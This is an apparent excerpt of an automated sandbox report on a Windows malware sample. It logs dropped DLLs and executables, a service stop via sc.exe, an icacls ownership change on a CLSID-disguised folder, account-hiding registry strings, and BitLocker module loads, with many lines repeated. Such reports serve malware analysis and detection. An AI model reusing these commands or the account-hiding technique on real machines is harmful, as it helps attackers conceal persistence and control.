Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\user\Desktop\ET5.exeFile created: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\erT926zeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\rmcjgYnLJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\y8J74cEHJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ypqwg32tJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\fYg6Jeg5Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\3rVpJMV7Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\L0FsI2PIJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\rVtDGbMQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\gBXHuZY0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\erT926zeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\rmcjgYnLJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\y8J74cEHJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ypqwg32tJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\fYg6Jeg5Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\3rVpJMV7Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\rVtDGbMQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\gBXHuZY0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\3rVpJMV7Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\L0FsI2PIJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\erT926zeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\y8J74cEHJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\rmcjgYnLJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\fYg6Jeg5Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ypqwg32tJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF708878C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF708878C4A
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

barindex
Contains functionality to hide user accounts
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe, 0000000A.00000002.2415695777.00007FF6FFB9E000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.4528136230.000001B980A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: samctl.dll.22.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: samctl.dll.22.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: update.pkg.10.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: update.pkg.10.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Users\user\Desktop\ET5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ET5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ET5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ET5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
